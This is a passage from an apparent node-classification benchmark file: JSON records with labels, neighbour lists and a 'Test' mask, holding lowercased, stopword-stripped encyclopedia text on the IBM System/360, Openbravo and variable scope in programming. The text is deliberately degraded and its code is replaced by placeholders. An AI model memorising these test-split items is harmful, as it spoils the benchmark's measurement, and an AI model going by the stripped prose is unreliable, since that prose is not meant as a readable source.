devices attached example could control unit 6 disks would addressed c0-c5 three general types bus-and-tag cables produced ibm first standard gray bus-and-tag cable followed blue bus-and-tag cable finally tan bus-and-tag cable generally newer cable revisions capable higher speeds longer distances peripherals specified minimum cable revisions upstream downstream cable ordering control units channel also significant control unit strapped high low priority device selection sent mainframe channel selection sent x- y- z- y- x control unit high selection checked outbound direction low inbound direction thus control unit x either 1st 5th either 2nd 4th z 3rd line also possible multiple channels attached control unit multiple mainframes thus providing rich high-performance multiple-access backup capability typically total cable length channel limited 200 feet less preferred control unit accounts 10 feet 200-foot limit ibm introduced new type i/o channel model 85 model 195 2880 block multiplexer channel channel allowed device suspend channel program pending completion i/o operation thus free channel use another device channels support either standard 1.5 mb/second connections 2-byte interface feature 3 mb/second latter use one tag cable two bus cables initial use 2305 fixed-head disk 8 exposures alias addresses rotational position sensing rps standard system/370 thereafter block multiplexer channels operate selector channel allow compatible attachment legacy subsystems uncertain reliability availability new monolithic integrated circuits ibm chose instead design manufacture custom hybrid integrated circuits built 11 mm square ceramic substrates resistors silk screened discrete glass encapsulated transistors diodes added substrate covered metal lid encapsulated plastic create solid logic technology slt module number slt modules flip chip mounted onto small multi-layer printed circuit slt card card one two sockets one edge plugged onto pins one computer slt boards reverse company cards mounted cards pins printed contact areas plugged sockets computer boards twenty slt boards could assembled side-by-side vertically horizontally form logic gate several gates mounted together constituted box-shaped logic frame outer gates generally hinged along one vertical edge could swung open provide access fixed inner gates larger machines could one frame bolted together produce final unit multi-frame central processing unit cpu smaller system/360 models used basic operating system/360 bos/360 tape operating system tos/360 disk operating system/360 dos/360 evolved dos/vs dos/vse vse/af vse/sp vse/esa z/vse larger models used operating system/360 os/360 ibm developed several versions os/360 increasingly powerful features primary control program pcp multiprogramming fixed number tasks mft multiprogramming variable number tasks mvt mvt took long time develop usable system less ambitious mft widely used pcp used intermediate machines final releases os/360 included mft mvt system/370 later machines mft evolved os/vs1 mvt evolved os/vs2 svs single virtual storage various versions mvs multiple virtual storage culminating current z/os announced model 67 august 1965 ibm also announced tss/360 time-sharing system delivery time 67 tss/360 response multics ambitious project included many advanced features performance problems delayed canceled reinstated finally canceled 1971 customers migrated cp-67 mts michigan terminal system tso time sharing option os/360 one several time-sharing systems cp-67 original virtual machine system also known cp/cms cp/67 developed outside ibm mainstream ibm cambridge scientific center cooperation mit researchers cp/cms eventually wide acceptance led development vm/370 virtual machine primary interactive sub operating system known vm/cms conversational monitoring system evolved today z/vm model 20 offered simplified rarely used tape-based system called tps tape processing system dps disk processing system provided support 2311 disk drive tps could run machine 8 kb memory dps required 12 kb pretty hefty model 20 many customers ran quite happily 4 kb cps card processing system tps dps card reader used read job control language cards defined stack jobs run read transaction data customer payments operating system held tape disk results could also stored tapes hard drives stacked job processing became exciting possibility small adventurous computer user little-known little-used suite 80-column punched-card utility programs known basic programming support bps jocularly barely programming support precursor tos available smaller systems ibm created new naming system new components created system/360 although well-known old names like ibm 1403 ibm 1052 retained new naming system components given four-digit numbers starting 2 second digit described type component follows ibm developed new family peripheral equipment system/360 carrying older 1400 series interfaces standardized allowing greater flexibility mix match processors controllers peripherals earlier product lines addition system/360 computers could use certain peripherals originally developed earlier computers earlier peripherals used different numbering system ibm 1403 chain printer 1403 extremely reliable device already earned reputation workhorse sold 1403-n1 adapted system/360 also available optical character recognition ocr readers ibm 1287 ibm 1288 could read alpha numeric a/n numeric hand printed nhp/nhw characters cashier rolls tape full legal size pages time done large optical/logic readers software slow expensive time small systems sold ibm 1052-7 console typewriter tightly integrated cpu — keyboard would physically lock program control certain high-end machines could optionally purchased 2250 graphical display costing upwards us 100,000 360/85 used 5450 display console compatible anything else line later 3066 console 370/165 370/168 used basic display design 360/85 first disk drives system/360 ibm 2302s ibm 2311s 156 kb/second 2302 based earlier 1302 available model 3 two 112.79 mb modules model 4 four modules 2311 removable 1316 disk pack based ibm 1311 theoretical capacity 7.2 mb although actual capacity varied record design used 360/20 1316 pack formatted fixed-length 270 byte sectors giving maximum capacity 5.4mb 1966 first 2314s shipped device eight usable disk drives integral control unit nine drives one reserved spare drive used removable 2316 disk pack capacity nearly 28 mb disk packs 2311 2314 physically large today standards — e.g. 1316 disk pack diameter six platters stacked central spindle top bottom outside platters store data data recorded inner sides top bottom platters sides inner platters providing 10 recording surfaces 10 read/write heads moved together across surfaces platters formatted 203 concentric tracks reduce amount head movement seeking data written virtual cylinder inside top platter inside bottom platter disks usually formatted fixed-sized sectors today hard drives though done cp/cms rather system/360 i/o software could customize length data record variable-length records case magnetic tapes powerful early system/360s used high-speed head-per-track drum storage devices 3,500 rpm 2301 replaced 7320 part original system/360 announcement capacity 4 mb 303.8 kb/second ibm 2303 announced january 31 1966 capacity 3.913 mb drums announced system/360 system/370 niche later filled fixed-head disks 6,000 rpm 2305 appeared 1970 capacities 5 mb 2305-1 11 mb 2305-2 per module although devices large capacity speed transfer rates made attractive high-performance needs typical use overlay linkage e.g os application subroutines program sections written alternate memory regions fixed head disks drums particularly effective paging devices early virtual memory systems 2305 although often called drum actually head-per-track disk device 12 recording surfaces data transfer rate 3 mb per second rarely seen ibm 2321 data cell mechanically complex device contained multiple magnetic strips hold data strips could randomly accessed placed upon cylinder-shaped drum read/write operations returned internal storage cartridge ibm data cell noodle picker among several ibm trademarked speedy mass online direct-access storage peripherals reincarnated recent years virtual tape automated tape librarian peripherals 2321 file capacity 400 mb time 2311 disk drive 7.2 mb ibm data cell proposed fill cost/capacity/speed gap magnetic tapes—which high capacity relatively low cost per stored byte—and disks higher expense per byte installations also found electromechanical operation less dependable opted less mechanical forms direct-access storage model 44 unique offering integrated single-disk drive standard feature drive used 2315 ramkit cartridge provided 1,171,200 bytes storage 2400 tape drives consisted combined drive control unit plus individual 1/2 tape drives attached system/360 ibm switched ibm 7 track 9 track tape format 2400 drives could purchased read wrote 7-track tapes compatibility older ibm 729 tape drives 1967 slower cheaper pair tape drives integrated control unit introduced 2415 1968 ibm 2420 tape system released offering much higher data rates self-threading tape operation 1600bpi packing density remained product line 1979 despite sold leased large numbers mainframe system era system/360 computers remain mainly non-operating property museums collectors examples existing systems include running list remaining system/360s found world inventory remaining system/360 cpus gallery shows operator console register value lamps toggle switches middle pictures emergency pull switch upper right pictures various models us television series mad men 2007–2015 ibm 360 featured plot device company leased system advertising agency prominent background seventh season crowdfunding campaign rescuing restoring ibm 360 system nuremberg received successful funding",
    "neighbors": [
      512,
      7173,
      9739,
      10267,
      8732,
      10786,
      10796,
      3630,
      7733,
      6207,
      9291,
      2638,
      9811,
      11351,
      2652,
      6242,
      9829,
      6248,
      8301,
      6772,
      4726,
      2168,
      9351,
      9355,
      663,
      1176,
      6296,
      8352,
      6821,
      1702,
      10415,
      2224,
      6325,
      7349,
      9911,
      1219,
      2243,
      8388,
      6342,
      9932,
      8911,
      5857,
      5359,
      1776,
      3315,
      3323,
      2811,
      2813,
      3841,
      6926,
      11539,
      1823,
      3359,
      7983,
      5936,
      7477,
      8502,
      10040,
      4921,
      9019,
      11075,
      2383,
      5457,
      7507,
      11604,
      9047,
      10072,
      1376,
      868,
      10094,
      3443,
      6515,
      3960,
      7550,
      8063,
      7053,
      8078,
      11153,
      11673,
      6557,
      10668,
      2994,
      5044,
      5557,
      7607,
      5562,
      453,
      8136,
      5065,
      11217,
      2519,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 10509,
    "label": 7,
    "text": "Openbravo:openbravo openbravo cloud-based software provider specialized retail solutions head office openbravo s.l located pamplona spain openbravo also offices barcelona paris mexico df kolkata company main product openbravo commerce cloud cloud-based pos retail management solution worldwide distribution implementations software openbravo relies heavily partner network openbravo multiple-time winner infoworld bossie award best open source software application last awarded august 2014 openbravo roots development business administration software first developed two employees university navarra nicolas serrano ismael ciordia involved mid 1990s developing management university used emerging internet technologies work subsequently introduced new approach web applications concept realized new company called tecnicia founded august 2001 serrano ciordia aguinaga 2005 two management consultants manel sarasa josep mitjá asked venture capital company evaluate tecnicia prepare business plan evolution 2006 two consultants joined tecnicia ceo coo respectively around time spanish investment company sodena invested 6.4 million usd development company 2006 company renamed openbravo first product launched openbravo erp code open-sourced april year 2007 company announced acquisition librepos java-based point-of-sale pos application retail hospitality businesses librepos rebranded openbravo pos openbravo java pos may 2008 openbravo attracted three investors amadeus uk gimv belgium adara spain second investment round totalling 12.5 million usd investment launched openbravo one leading open source companies substantial resources develop products services july 2012 openbravo launched openbravo retail vertical solution retail industry including openbravo web pos new pos solution replaced previous openbravo java pos openbravo web pos web mobile responsive pos solution march 2014 openbravo erp renamed openbravo erp platform openbravo retail renamed openbravo commerce platform may 2015 openbravo commerce platform openbravo erp platform renamed openbravo commerce suite openbravo business suite openbravo announces strategic focus retail openbravo also launches openbravo subscription management recurring billing specialized solution recurring transactions based revenue models openbravo present 60 countries global partner network openbravo targets today mid-sized large organizations seeking complete solution manage entire business specific solutions help improve existing legacy systems openbravo focuses strategy retail openbravo commerce suite openbravo erp first product launched openbravo web-based erp business solution small medium-sized companies released openbravo public license based mozilla public license model program originally based compiere erp program also open source released gnu general public license version 2 program among top ten active projects sourceforge january 2008 using openbravo erp organizations automate register common business processes following processes supported sales procurement manufacturing projects finance mrp numerous commercial extensions available openbravo exchange procured users commercial edition openbravo erp paid-for version offers additional functionality compared free community edition integrated administration tools non-technical tool updates upgrades access openbravo exchange service level agreement characteristic openbravo erp application green web interface users maintain company data web-browser openbravo also create export reports data several formats pdf microsoft excel openbravo java-based architecture focuses two development models two models allow integration programs simple interface application open standards openbravo erp integrated open source applications like magento webshop pentaho business intelligence processmaker bpm liferay portal sugarcrm march 2014 openbravo erp renamed openbravo erp platform changed openbravo business suite may 2015 openbravo pos first pos solution offered openbravo java point-of-sale pos application retail hospitality businesses application came existence called tinapos legal reasons application renamed librepos 2007 librepos acquired openbravo known current name program completely integrated openbravo erp integration possible update stock levels financial journals customer data directly central database pos sales executed stores openbravo pos applied using pdas order intake july 2012 openbravo launched new pos solution openbravo web pos included openbravo commerce suite replaced openbravo java pos openbravo business suite launched may 2015 replacing previous openbravo erp platform global management solution built top openbravo technology platform including horizontal erp crm bi functionality across industries see latest confirmed stable cs release business suite release notes openbravo commerce suite openbravo solution retailers multi-channel retail management solution including responsive web mobile pos openbravo web pos backed comprehensive functionality merchandise management supply chain management enterprise management see latest confirmed stable cs release openbravo commerce suite release notes openbravo web pos launched 2012 included openbravo retail solution today openbravo commerce suite responsive web mobile pos solution core component functionality physical stores openbravo technology platform lies heart openbravo solutions modular mobile-enabled cloud-ready platform providing core set technologies allow extending openbravo fit companies needs developing completely new enterprise solutions looking best html5 framework openbravo mobile decided choose enyo openbravo web pos mobile solution openbravo analytics embedded analytics engine provides business intelligence capabilities openbravo solutions provides infrastructure necessary create analytical cubes olap reports combines power high performing open source business intelligence components pentaho use mondrian saiku allied openbravo user interface provide fully integrated analytics solution commercial solution companies recurring billing revenue models including functionality pricing definition automatic revenue recognition accounting openbravo user interface available multiple languages like english spanish french italian brazilian amongst others openbravo solutions distributed subscription-based model customers subscribe number users and/or pos terminals bundled pack services additional options two different commercial editions customers subscribe additional users and/or pos terminals well additional functionality packaged extension modules examples extension modules country localizations connectors like sugarcrm tools developed openbravo partners addition commercial editions community edition exists free limited set capabilities available without professional support available openbravo partners openbravo products distributed following licenses openbravo many partners across world including exceloid soft systems india",
    "neighbors": [
      7489,
      1539,
      5224,
      11113,
      6091,
      1612,
      5677,
      7532,
      10509,
      1008,
      1680
    ],
    "mask": "Test"
  },
  {
    "node_id": 10510,
    "label": 9,
    "text": "Scope_(computer_science):scope computer science computer programming scope name binding – association name entity variable – region computer program binding valid name used refer entity region referred parts program name may refer different entity may different binding nothing may unbound scope binding also known visibility entity particularly older technical literature – perspective referenced entity referencing name scope part program scope set bindings – precise definition tricky casual use practice largely corresponds block function file depending language type entity term scope also used refer set entities visible names valid within portion program given point program correctly referred context environment strictly speaking practice programming languages part program refers portion source code area text known lexical scope languages however part program refers portion run time time period execution known dynamic scope terms somewhat misleading – misuse technical terms discussed definition – distinction accurate precise standard respective terms lexical scope main focus article dynamic scope understood contrast lexical scope cases name resolution based lexical scope relatively straightforward use implement use one read backwards source code determine entity name refers implementation one maintain list names contexts compiling interpreting program difficulties arise name masking forward declarations hoisting considerably subtler ones arise non-local variables particularly closures strict definition lexical scope name identifier unambiguous – portion source code binding name entity applies – virtually unchanged 1960 definition specification algol 60 representative language specification follow commonly scope refers given name refer given variable – declaration effect – also apply entities functions types classes labels constants enumerations fundamental distinction scoping part program means languages lexical scope also called static scope name resolution depends location source code lexical context defined named variable function defined contrast languages dynamic scope name resolution depends upon program state name encountered determined execution context calling context practice lexical scope variable definition resolved searching containing block function fails searching outer containing block whereas dynamic scope calling function searched function called calling function progressing call stack course rules first look local definition variable modern languages use lexical scoping variables functions though dynamic scoping used languages notably dialects lisp scripting languages template languages perl 5 offers lexical dynamic scoping even lexically scoped languages scope closures confusing uninitiated depend lexical context closure defined called lexical resolution determined compile time also known early binding dynamic resolution general determined run time thus known late binding object-oriented programming dynamic dispatch selects object method runtime though whether actual name binding done compile time run time depends language de facto dynamic scoping common macro languages directly name resolution instead expand place programming frameworks like angularjs use term scope mean something entirely different used article frameworks scope object programming language use javascript case angularjs used certain ways framework emulate dynamic scope language uses lexical scope variables angularjs scopes scope scope using usual meaning term given part program following usual rules variable scope language like object using inheritance transclusion rules context angularjs sometimes term scope dollar sign used avoid confusion using dollar sign variable names often discouraged style guides scope important component name resolution turn fundamental language semantics name resolution including scope varies programming languages within programming language varies type entity rules scope called scope rules scoping rules together namespaces scoping rules crucial modular programming change one part program break unrelated part discussing scope three basic concepts scope extent context scope context particular frequently confused scope property identifier fixed context property program varies position precisely context property position program either position source code lexical context point run time execution context runtime context calling context execution context consists lexical context current execution point plus additional runtime state call stack thus execution point program variable name scope variable name context meaning context point execution point exits variable name scope returning function variable name goes context narrowly speaking execution program enters exits various scopes point execution identifiers context context hence identifiers come context go context program enters exits scope – however practice usage much looser scope source-code level concept property identifiers particularly variable function names – identifiers source code references entities program – part behavior compiler interpreter language issues scope similar pointers type reference used programs generally using value variable name context variable uninitialized analogous dereferencing accessing value wild pointer undefined however variables destroyed go context analog dangling pointer exist entities variables scope subset lifetime also known extent – name refer variable exists possibly undefined value variables exist necessarily visible variable may exist inaccessible value stored referred within given context accessible via given name case context program scope name cases lifetime irrelevant – label named position source code lifetime identical program statically compiled languages may context given point program likewise static variables – static global variable context entire program static local variable context within function local context lifetime entire run program determining entity identifier refers known name resolution name binding particularly object-oriented programming varies languages given identifier language properly compiler interpreter checks entities context matches case ambiguity two entities name global local variable name name resolution rules used distinguish frequently name resolution relies inner-to-outer rule python legb local enclosing global built-in rule names implicitly resolves narrowest relevant context cases name resolution explicitly specified codice_1 codice_2 keywords python cases default rules overridden two identical identifiers context time referring different entities one says name masking occurring higher-priority name usually innermost masking lower-priority name level variables known variable shadowing due potential logic errors masking languages disallow discourage masking raising error warning compile time run time various programming languages various different scoping rules different kinds declarations identifiers scoping rules large effect language semantics consequently behavior correctness programs languages like c++ accessing unbound variable well-defined semantics may result undefined behavior similar referring dangling pointer declarations identifiers used outside scope generate syntax errors scopes frequently tied language constructs determined implicitly many languages also offer constructs specifically controlling scope scope vary little single expression much entire program many possible gradations simplest scoping rule global scope – entities visible throughout entire program basic modular scoping rule two-level scoping global scope anywhere program local scope within function sophisticated modular programming allows separate module scope names visible within module private module visible outside within function languages c allow block scope restrict scope subset function others notably functional languages allow expression scope restrict scope single expression scopes include file scope notably c functions similarly module scope block scope outside functions notably perl subtle issue exactly scope begins ends languages c scope starts declaration thus different names declared within given block different scopes requires declaring functions use though necessarily defining requires forward declaration cases notably mutual recursion languages javascript python name scope begins start relevant block start function regardless defined names within given block scope javascript known variable hoisting however name bound value varies behavior in-context names undefined value differs python use undefined variables yields runtime error javascript undefined variables usable undefined value function declarations also hoisted top containing function usable throughout function many languages especially functional languages offer feature called let-expressions allow declaration scope single expression convenient example intermediate value needed computation example standard ml codice_3 returns 12 codice_4 expression evaluates 144 using temporary variable named x avoid calling codice_3 twice languages block scope approximate functionality offering syntax block embedded expression example aforementioned standard ml expression could written perl gnu c python auxiliary variables generator expressions list comprehensions python 3 expression scope c variable names function prototype expression scope known context function protocol scope variable names prototype referred may different actual definition – dummies – often omitted though may used generating documentation instance many block-structured programming languages allow scope restricted block known block scope began algol 60 e declaration ... valid block today particularly associated languages pascal c families traditions often block contained within function thus restricting scope part function cases perl block may within function representative example use block scope c code shown two variables scoped loop loop variable n initialized incremented iteration loop auxiliary variable n_squared initialized iteration purpose avoid adding variables function scope relevant particular block – example prevents errors generic loop variable accidentally already set another value example expression codice_6 would generally assigned auxiliary variable body loop would simply written codice_7 complicated examples auxiliary variables useful blocks primarily used control flow loops cases block scope means scope variable depends structure function flow execution however languages block scope typically also allow use naked blocks whose sole purpose allow fine-grained control variable scope example auxiliary variable may defined block used say added variable function scope discarded block ends loop might enclosed block initializes variables used inside loop initialized subtlety several programming languages algol 68 c demonstrated example standardized since c99 block-scope variables declared within body block also within control statement analogous function parameters declared function declaration block function body starts scope whole function body primarily used loops initialization statement separate loop condition unlike loops common idiom block scope used shadowing example inside block auxiliary variable could also called n shadowing parameter name considered poor style due potential errors furthermore descendants c java c despite support block scope local variable made go scope end function allow one local variable hide another languages attempted declaration second n would result syntax error one n variables would renamed block used set value variable block scope requires variable declared outside block complicates use conditional statements single assignment example python use block scope one may initialize variable codice_8 accessible codice_9 statement perl block scope instead requires declaring variable prior block often instead rewritten using multiple assignment initializing variable default value python necessary would perl would case single variable assignment alternative use ternary operator avoid block general possible multiple variable assignments difficult read complex logic significant issue c notably string assignment string initialization automatically allocate memory string assignment already initialized variable requires allocating memory string copy checking successful languages allow concept block scope applied varying extents outside function example perl snippet right counter variable name block scope due use keyword increment_counter function name global scope call increment_counter increase value counter one return new value code outside block call increment_counter otherwise obtain alter value counter idiom allows one define closures perl commonly used programming languages offer way create local variable function subroutine variable whose scope ends goes context function returns cases lifetime variable duration function call – automatic variable created function starts variable declared destroyed function returns – scope variable within function though meaning within depends whether scoping lexical dynamic however languages c also provide static local variables lifetime variable entire lifetime program variable context inside function case static local variables variable created program initializes destroyed program terminates static global variable context within function like automatic local variable importantly lexical scoping variable function scope scope within lexical context function moves context another function called within function moves back context function returns – called functions access local variables calling functions local variables context within body function declared contrast dynamic scoping scope extends runtime context function local variables stay context another function called moving context defining function ends thus local variables context function defined called functions languages lexical scoping nested functions local variables context nested functions since within lexical context functions lexically nested local variable enclosing function known non-local variable nested function function scope also applicable anonymous functions example snippet python code right two functions defined square sum_of_squares square computes square number sum_of_squares computes sum squares number example square 4 4 16 sum_of_squares 4 0 1 2 3 4 30 functions variable named n represents argument function two n variables completely separate unrelated despite name lexically scoped local variables function scope one scope lexically separate function thus n't overlap therefore sum_of_squares call square without n altered similarly sum_of_squares variables named total variables limited scope interfere variables named total might belong function words risk name collision identifiers unrelated identifiers even identical note also name masking occurring one variable named n context given time scopes overlap contrast similar fragment written language dynamic scope n calling function would remain context called function – scopes would overlap – would masked shadowed new n called function function scope significantly complicated functions first-class objects created locally function returned case variables nested function local unbound variables function definition resolve variables enclosing context create closure function also environment variables must returned potentially called different context requires significantly support compiler complicate program analysis scoping rule largely particular c c++ file scope scope variables functions declared top level file within function entire file – rather c declaration end source file precisely translation unit internal linking seen form module scope modules identified files modern languages replaced explicit module scope due presence include statements add variables functions internal context may call include statements difficult determine context body file c code snippet function name sum_of_squares file scope modular programming scope name entire module however may structured across various files paradigm modules basic unit complex program allow information hiding exposing limited interface module scope pioneered modula family languages python influenced modula representative contemporary example object-oriented programming languages lack direct support modules c++ similar structure instead provided class hierarchy classes basic unit program class private methods properly understood context dynamic dispatch rather name resolution scope though often play analogous roles cases facilities available python modules classes code organization module-level function conventionally private method choice programmer declaration global scope effect throughout entire program variable names global scope — called global variables — frequently considered bad practice least languages due possibility name collisions unintentional masking together poor modularity function scope block scope considered preferable however global scope typically used depending language various sorts identifiers names functions names classes data types cases mechanisms namespaces used avoid collisions use local variables — variable names limited scope exist within specific function — helps avoid risk name collision two identically named variables however two different approaches answering question mean within function lexical scoping lexical scope also called static scoping static scope variable name scope certain function scope program text function definition within text variable name exists bound variable value outside text variable name exist contrast dynamic scoping dynamic scope variable name scope certain function scope time-period function executing function running variable name exists bound value function returns variable name exist means function f invokes separately defined function g lexical scoping function g access f local variables assuming text g inside text f dynamic scoping function g access f local variables since g invoked invocation f consider example program right first line creates global variable x initializes 1 second line defines function g prints echoes current value x sets x 2 overwriting previous value third line defines function f creates local variable x hiding identically named global variable initializes 3 calls g. fourth line calls f. fifth line prints current value x exactly program print depends scoping rules language program one uses lexical scoping g prints modifies global variable x g defined outside f program prints 1 2 contrast language uses dynamic scoping g prints modifies f local variable x g called within f program prints 3 1 happens language program bash uses dynamic scoping program prints 3 1 lexical scope name always refers less local lexical environment property program text made independent runtime call stack language implementation matching requires analysis static program text type scoping also called static scoping lexical scoping standard algol-based languages pascal modula-2 ada well modern functional languages ml haskell also used c language syntactic semantic relatives although different kinds limitations static scoping allows programmer reason object references parameters variables constants types functions etc simple name substitutions makes much easier make modular code reason since local naming structure understood isolation contrast dynamic scope forces programmer anticipate possible dynamic contexts module code may invoked example consider pascal program fragment right variable codice_10 visible points never hidden another variable name codice_11 variable codice_12 visible main program hidden codice_13 variable codice_12 visible procedure codice_15 codice_16 variable codice_17 also visible procedure codice_15 codice_16 hide variable variable codice_20 visible procedure codice_16 therefore accessible either procedure codice_15 main program also procedure codice_16 visible procedure codice_15 therefore called main program could another procedure codice_16 declared program outside procedure codice_15 place program codice_16 mentioned determines two procedures named codice_16 represents thus precisely analogous scope variables correct implementation static scope languages first-class nested functions trivial requires function value carry record values variables depends pair function environment called closure depending implementation computer architecture variable lookup may become slightly inefficient deeply lexically nested functions used although well-known techniques mitigate also nested functions refer arguments immediately local variables relative locations known compile time overhead therefore incurred using type nested function applies particular parts program nested functions used naturally programs written language nested functions available c language lexical scoping used algol picked languages since deep binding approximates static lexical scoping introduced lisp 1.5 via funarg device developed steve russell working john mccarthy original lisp interpreter 1960 early lisps used dynamic scoping descendants dynamically scoped languages often adopt static scoping common lisp scheme srfi 15 dynamic static scoping perl another language dynamic scoping added static scoping afterwards languages like pascal c always lexical scoping since influenced ideas went algol 60 although c include lexically nested functions term lexical scope dates least 1967 term lexical scoping dates least 1970 used project mac describe scoping rules lisp dialect mdl known muddle dynamic scope global identifier refers identifier associated recent environment uncommon modern languages technical terms means identifier global stack bindings introducing local variable name codice_29 pushes binding onto global codice_29 stack may empty popped control flow leaves scope evaluating codice_29 context always yields top binding note done compile-time binding stack exists run-time type scoping called dynamic scoping generally certain blocks defined create bindings whose lifetime execution time block adds features static scoping dynamic scoping process however since section code called many different locations situations difficult determine outset bindings apply variable used one exists beneficial application principle least knowledge suggests code avoid depending reasons circumstances variable value simply use value according variable definition narrow interpretation shared data provide flexible system adapting behavior function current state policy system however benefit relies careful documentation variables used way well careful avoidance assumptions variable behavior provide mechanism detect interference different parts program dynamic scoping also voids benefits referential transparency dynamic scoping dangerous modern languages use languages like perl common lisp allow programmer choose static dynamic scoping defining redefining variable examples languages use dynamic scoping include logo emacs lisp latex shell languages bash dash powershell dynamic scoping fairly easy implement find identifier value program could traverse runtime stack checking activation record function stack frame value identifier practice made efficient via use association list stack name/value pairs pairs pushed onto stack whenever declarations made popped whenever variables go scope shallow binding alternative strategy considerably faster making use central reference table associates name stack meanings avoids linear search run-time find particular name care taken properly maintain table note strategies assume last-in-first-out lifo ordering bindings one variable practice bindings ordered even simpler implementation representation dynamic variables simple global variables local binding performed saving original value anonymous location stack invisible program binding scope terminates original value restored location fact dynamic scope originated manner early implementations lisp used obvious strategy implementing local variables practice survives dialects still use gnu emacs lisp lexical scope introduced lisp later equivalent shallow binding scheme except central reference table simply global variable binding environment current meaning variable global value maintaining global variables n't complex instance symbol object dedicated slot global value dynamic scoping provides excellent abstraction thread local storage used way based saving restoring global variable possible implementation strategy variable thread-local key variable accessed thread-local key used access thread-local memory location code generated compiler knows variables dynamic lexical thread-local key exist calling thread global location used variable locally bound prior value stored hidden location stack thread-local storage created variable key new value stored nested overrides variable within thread simply save restore thread-local location initial outer-most override scope terminates thread-local key deleted exposing global version variable thread modern languages macro expansion preprocessor key example de facto dynamic scope macro language transforms source code without resolving names since expansion done place names expanded text resolved notably free variables resolved based expanded loosely called dynamic scoping occurring c preprocessor used macro expansion de facto dynamic scope name resolution example macro expand add codice_8 passed variable identifier later resolved compiler based macro codice_33 called properly expanded dynamic scope independent macro defined properly c preprocessor lexical analysis expanding macro tokenization stage parsing syntax tree name resolution example following code codice_8 macro resolved expansion local variable expansion site seen one key reasons scope helps prevent name collisions allowing identical identifiers refer distinct things restriction identifiers must separate scopes sometimes restriction inconvenient many different things need accessible throughout program generally need identifiers global scope different techniques required avoid name collisions address many languages offer mechanisms organizing global identifiers details mechanisms terms used depend language general idea group identifiers given name — prefix — necessary entity referred qualified identifier consisting identifier plus prefix normally identifiers sense two sets scopes scope usually global scope qualified identifier visible one narrower scopes unqualified identifier without prefix visible well normally groups organized groups nested although many languages support concept details vary greatly languages mechanisms namespaces c++ c serve almost exclusively enable global identifiers organized groups languages mechanisms packages ada structures standard ml combine additional purpose allowing identifiers visible members group object-oriented languages often allow classes singleton objects fulfill purpose whether also mechanism primary purpose furthermore languages often meld approaches example perl packages largely similar c++ namespaces optionally double classes object-oriented programming java organizes variables functions classes organizes classes ada-like packages scoping rules representative languages follow c scope traditionally known linkage visibility particularly variables c lexically scoped language global scope known external linkage form module scope file scope known internal linkage local scope within function within function scopes nested via block scope however standard c support nested functions lifetime visibility variable determined storage class three types lifetimes c static program execution automatic block execution allocated stack manual allocated heap static automatic supported variables handled compiler manually allocated memory must tracked manually across different variables three levels visibility c external linkage global internal linkage roughly file block scope includes functions block scopes nested different levels internal linkage possible use includes internal linkage c visibility translation unit level namely source file processed c preprocessor notably including relevant includes c programs compiled separate object files linked executable library via linker thus name resolution split across compiler resolves names within translation unit loosely compilation unit properly different concept linker resolves names across translation units see linkage discussion c variables block scope enter scope declared top block move scope non-nested function called within block move back scope function returns move scope end block case automatic local variables also allocated declaration deallocated end block static local variables allocated program initialization deallocated program termination following program demonstrates variable block scope coming scope partway block exiting scope fact deallocated block ends program outputs levels scope c. variable names used function prototype function prototype visibility exit scope end function prototype since name used useful compilation may useful documentation label names goto statement function scope case label names switch statements block scope block switch variables intend use program must declared type specifier earlier point code like previous code beginning body function main declared b result type int variable either global local scope global variable variable declared main body source code outside functions local variable one declared within body function block modern versions allow nested lexical scoping go lexically scoped using blocks java lexically scoped java class contain three types variables local variables defined inside method particular block variables local defined lower levels example loop inside method use method local variables way around loop variables local loop destroyed soon loop ends member variables also called fields variables declared within class outside method default variables available methods within class also classes package parameters variables method declarations general set brackets defines particular scope variables top level within class differ behavior depending modifier keywords used definition following table shows access members permitted modifier javascript simple scoping rules variable initialization name resolution rules cause problems widespread use closures callbacks means lexical environment function defined used name resolution different lexical environment called irrelevant name resolution javascript objects name resolution properties separate topic javascript lexical scoping nested function level global scope outermost scope scoping used variables functions meaning function declarations opposed variables function type block scoping codice_35 codice_36 keywords standard since ecmascript 6 block scoping produced wrapping entire block function executing known immediately-invoked function expression iife pattern javascript scoping simple – lexical function-level – associated initialization name resolution rules cause confusion firstly assignment name scope defaults creating new global variable local one secondly create new local variable one must use codice_37 keyword variable created top function value codice_38 variable assigned value assignment expression reached known variable hoisting – declaration initialization hoisted top function thirdly accessing variables initialization yields codice_38 rather syntax error fourthly function declarations declaration initialization hoisted top function unlike variable initialization example following code produces dialog output samp undefined /samp local variable declaration hoisted shadowing global variable initialization variable undefined used functions first-class objects javascript frequently assigned callbacks returned functions function executed name resolution depends originally defined lexical environment definition lexical environment execution environment called nested scopes particular function global local javascript particularly closure used callback sometimes referred scope chain analogy prototype chain object closures produced javascript using nested functions functions first-class objects returning nested function enclosing function includes local variables enclosing function non-local lexical environment returned function yielding closure example closures frequently used javascript due used callbacks indeed hooking function local environment callback returning function creates closure unbound variables function body environment closure based nested scopes current lexical environment scope chain may accidental creating callback based parameters parameters must stored closure otherwise accidentally create closure refers variables enclosing environment may change name resolution properties javascript objects based inheritance prototype tree – path root tree called prototype chain – separate name resolution variables functions lisp dialects various rules scoping original lisp used dynamic scoping scheme inspired algol introduced static lexical scoping lisp family maclisp used dynamic scope default interpreter lexical scope default compiled code though compiled code could access dynamic bindings use codice_40 declarations particular variables however maclisp treated lexical binding optimization one would expect modern languages come closure feature one might expect lexical scoping modern lisps separate operation codice_41 available somewhat clumsily work around issue common lisp adopted lexical scoping scheme clojure islisp lexical scoping ordinary variables also dynamic variables cases explicitly marked must defined codice_42 special form bound codice_43 special form accessed explicit codice_44 special form dialects lisp like emacs lisp still use dynamic scoping default emacs lisp lexical scoping available per-buffer basis variables python function scope module scope global scope names enter scope start context function module globally exit scope non-nested function called context ends name used prior variable initialization raises runtime exception variable simply accessed assigned context name resolution follows legb rule local enclosing global built-in however variable assigned defaults creating local variable scope entire context rules overridden codice_1 codice_2 python 3 declaration prior use allows accessing global variables even intervening nonlocal variable assigning global nonlocal variables simple example function resolves variable global scope note x initialized codice_47 called error raised even though declared codice_47 declared lexically forward reference allowed python assignment creates new local variable change value global variable assignment variable within function causes declared local function hence local variable scope entire function thus using prior assignment raises error differs c local variable scope declaration entire function code raises error default name resolution rules overridden codice_1 codice_2 python 3 keywords code codice_51 declaration codice_52 means x resolves global variable thus accessed already initialized assignment assigns global variable rather declaring new local variable note codice_1 declaration needed codice_47 – since assign variable defaults resolving global variable codice_1 also used nested functions addition allowing assignment global variable unnested function also used access global variable presence nonlocal variable nested functions also codice_2 declaration assigning nonlocal variable similar using codice_1 